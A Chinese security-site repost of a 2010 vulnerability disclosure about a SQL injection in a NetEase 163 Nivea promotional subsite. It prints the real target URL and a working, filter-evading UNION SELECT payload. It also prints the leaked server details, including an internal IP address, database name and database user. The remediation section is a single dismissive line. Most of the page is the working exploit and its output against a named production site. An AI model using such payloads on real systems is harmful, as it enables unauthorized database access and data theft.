频道栏目
首页 > 安全 > 网站安全 > 正文

163分站--妮维雅曲线大挑战 注入漏洞及修复

2010-12-20 12:36:29      个评论      
收藏   我要投稿

简要描述:注入漏洞,可以暴露出很多敏感信息
详细说明:

\

http://nivea.163.com/girl.php?userID=1191
提交代码
AnD 1=2 UnIoN aLl SeLeCt 1,2,3,4,5,6,7,8,9,10,CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user()),12,13,14,15,16,17 %23


漏洞证明:

\

163的pc-linux-gnu : 4.0.26-log : minisite@10.100.50.23 : minisite2008 : minisite@10.100.50.23

http://nivea.163.com/girl.php?userID=1191 AnD 1=2 UnIoN aLl SeLeCt 1,2,3,4,5,6,7,8,9,10,CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user()),12,13,14,15,16,17 %23


修复方案:

注入漏洞 司空见惯 厂商很明白修复方式

相关TAG标签 漏洞 分站 曲线
上一篇:WEB安全测试通常要考虑的测试点
下一篇:金山毒霸多个sql注入及XSS漏洞和修复
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站